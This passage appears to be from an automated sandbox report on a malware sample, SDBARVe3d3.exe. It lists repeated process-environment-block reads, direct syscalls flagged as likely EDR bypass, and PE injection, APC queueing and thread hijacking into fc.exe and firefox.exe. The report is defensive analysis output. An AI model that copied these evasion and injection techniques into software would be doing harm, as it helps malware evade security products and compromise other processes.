                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017209AD mov eax, dword ptr fs:[00000030h]2_2_017209AD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017209AD mov eax, dword ptr fs:[00000030h]2_2_017209AD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AE872 mov eax, dword ptr fs:[00000030h]2_2_017AE872
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AE872 mov eax, dword ptr fs:[00000030h]2_2_017AE872
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6870 mov eax, dword ptr fs:[00000030h]2_2_017B6870
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6870 mov eax, dword ptr fs:[00000030h]2_2_017B6870
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01750854 mov eax, dword ptr fs:[00000030h]2_2_01750854
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724859 mov eax, dword ptr fs:[00000030h]2_2_01724859
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724859 mov eax, dword ptr fs:[00000030h]2_2_01724859
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01732840 mov ecx, dword ptr fs:[00000030h]2_2_01732840
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov ecx, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A830 mov eax, dword ptr fs:[00000030h]2_2_0175A830
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C483A mov eax, dword ptr fs:[00000030h]2_2_017C483A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C483A mov eax, dword ptr fs:[00000030h]2_2_017C483A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AC810 mov eax, dword ptr fs:[00000030h]2_2_017AC810
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C8F9 mov eax, dword ptr fs:[00000030h]2_2_0175C8F9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C8F9 mov eax, dword ptr fs:[00000030h]2_2_0175C8F9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EA8E4 mov eax, dword ptr fs:[00000030h]2_2_017EA8E4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E8C0 mov eax, dword ptr fs:[00000030h]2_2_0174E8C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F08C0 mov eax, dword ptr fs:[00000030h]2_2_017F08C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AC89D mov eax, dword ptr fs:[00000030h]2_2_017AC89D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720887 mov eax, dword ptr fs:[00000030h]2_2_01720887
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171CB7E mov eax, dword ptr fs:[00000030h]2_2_0171CB7E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]2_2_017F2B57
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]2_2_017F2B57
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]2_2_017F2B57
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]2_2_017F2B57
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CEB50 mov eax, dword ptr fs:[00000030h]2_2_017CEB50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D4B4B mov eax, dword ptr fs:[00000030h]2_2_017D4B4B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D4B4B mov eax, dword ptr fs:[00000030h]2_2_017D4B4B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6B40 mov eax, dword ptr fs:[00000030h]2_2_017B6B40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6B40 mov eax, dword ptr fs:[00000030h]2_2_017B6B40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EAB40 mov eax, dword ptr fs:[00000030h]2_2_017EAB40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C8B42 mov eax, dword ptr fs:[00000030h]2_2_017C8B42
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174EB20 mov eax, dword ptr fs:[00000030h]2_2_0174EB20
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174EB20 mov eax, dword ptr fs:[00000030h]2_2_0174EB20
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E8B28 mov eax, dword ptr fs:[00000030h]2_2_017E8B28
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E8B28 mov eax, dword ptr fs:[00000030h]2_2_017E8B28
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4B00 mov eax, dword ptr fs:[00000030h]2_2_017F4B00
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728BF0 mov eax, dword ptr fs:[00000030h]2_2_01728BF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728BF0 mov eax, dword ptr fs:[00000030h]2_2_01728BF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728BF0 mov eax, dword ptr fs:[00000030h]2_2_01728BF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174EBFC mov eax, dword ptr fs:[00000030h]2_2_0174EBFC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017ACBF0 mov eax, dword ptr fs:[00000030h]2_2_017ACBF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CEBD0 mov eax, dword ptr fs:[00000030h]2_2_017CEBD0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01740BCB mov eax, dword ptr fs:[00000030h]2_2_01740BCB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01740BCB mov eax, dword ptr fs:[00000030h]2_2_01740BCB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01740BCB mov eax, dword ptr fs:[00000030h]2_2_01740BCB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720BCD mov eax, dword ptr fs:[00000030h]2_2_01720BCD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720BCD mov eax, dword ptr fs:[00000030h]2_2_01720BCD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720BCD mov eax, dword ptr fs:[00000030h]2_2_01720BCD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730BBE mov eax, dword ptr fs:[00000030h]2_2_01730BBE
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730BBE mov eax, dword ptr fs:[00000030h]2_2_01730BBE
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D4BB0 mov eax, dword ptr fs:[00000030h]2_2_017D4BB0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D4BB0 mov eax, dword ptr fs:[00000030h]2_2_017D4BB0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179CA72 mov eax, dword ptr fs:[00000030h]2_2_0179CA72
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179CA72 mov eax, dword ptr fs:[00000030h]2_2_0179CA72
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175CA6F mov eax, dword ptr fs:[00000030h]2_2_0175CA6F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175CA6F mov eax, dword ptr fs:[00000030h]2_2_0175CA6F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175CA6F mov eax, dword ptr fs:[00000030h]2_2_0175CA6F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CEA60 mov eax, dword ptr fs:[00000030h]2_2_017CEA60
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730A5B mov eax, dword ptr fs:[00000030h]2_2_01730A5B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730A5B mov eax, dword ptr fs:[00000030h]2_2_01730A5B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01744A35 mov eax, dword ptr fs:[00000030h]2_2_01744A35
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01744A35 mov eax, dword ptr fs:[00000030h]2_2_01744A35
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175CA24 mov eax, dword ptr fs:[00000030h]2_2_0175CA24
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174EA2E mov eax, dword ptr fs:[00000030h]2_2_0174EA2E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017ACA11 mov eax, dword ptr fs:[00000030h]2_2_017ACA11
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175AAEE mov eax, dword ptr fs:[00000030h]2_2_0175AAEE
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175AAEE mov eax, dword ptr fs:[00000030h]2_2_0175AAEE
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720AD0 mov eax, dword ptr fs:[00000030h]2_2_01720AD0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01754AD0 mov eax, dword ptr fs:[00000030h]2_2_01754AD0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01754AD0 mov eax, dword ptr fs:[00000030h]2_2_01754AD0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01776ACC mov eax, dword ptr fs:[00000030h]2_2_01776ACC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01776ACC mov eax, dword ptr fs:[00000030h]2_2_01776ACC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01776ACC mov eax, dword ptr fs:[00000030h]2_2_01776ACC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728AA0 mov eax, dword ptr fs:[00000030h]2_2_01728AA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728AA0 mov eax, dword ptr fs:[00000030h]2_2_01728AA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01776AA4 mov eax, dword ptr fs:[00000030h]2_2_01776AA4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01758A90 mov edx, dword ptr fs:[00000030h]2_2_01758A90
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4A80 mov eax, dword ptr fs:[00000030h]2_2_017F4A80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtTerminateThread: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory written: C:\Users\user\Desktop\SDBARVe3d3.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: NULL target: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 2916Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess created: C:\Users\user\Desktop\SDBARVe3d3.exe "C:\Users\user\Desktop\SDBARVe3d3.exe"Jump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
